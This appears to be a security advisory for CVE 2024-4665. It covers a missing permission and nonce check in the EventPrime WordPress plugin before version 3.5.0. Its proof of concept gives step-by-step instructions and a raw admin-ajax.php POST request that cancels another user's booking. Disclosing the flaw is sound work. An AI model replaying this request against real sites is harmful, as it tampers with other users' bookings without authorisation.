EventPrime – Events Calendar, Bookings and Tickets < 3.5.0 – Subscriber+ Arbitrary booking settings update | CVE 2024-4665

Description

The plugin does not properly validate permissions when updating bookings, allowing users to change/cancel bookings for other users. Additionally, the feature is lacking a nonce.

Proof of Concept

PREREQUISITES:

- Event Must be bookable
- In event creation, under bookings ->Turn bookings on. 
- Under tickets, add ticket types for the event

STEP BY STEP:

Account A:
1 - Logged as account A,
2 - Go to the event page click "get tickets now" and follow the procedures to confirm the booking
3 - Booking details are saved in the account page
4 - save the booking id somewhere
 
Account B:
1 - Log into another account, the plugin enables the possibility of creating accounts
2 - Save the cookies of Account B
3 - Replay the following request in burp with the booking_id of the victim and the cookies of Account b

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: HOST.TLD
Content-Length: 62
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: WP_COOKIES
Connection: close

action=ep_booking_update_status&booking_id=33&status=cancelled

Account A:
1 - Log into account a to see that the event booking was indeed canceled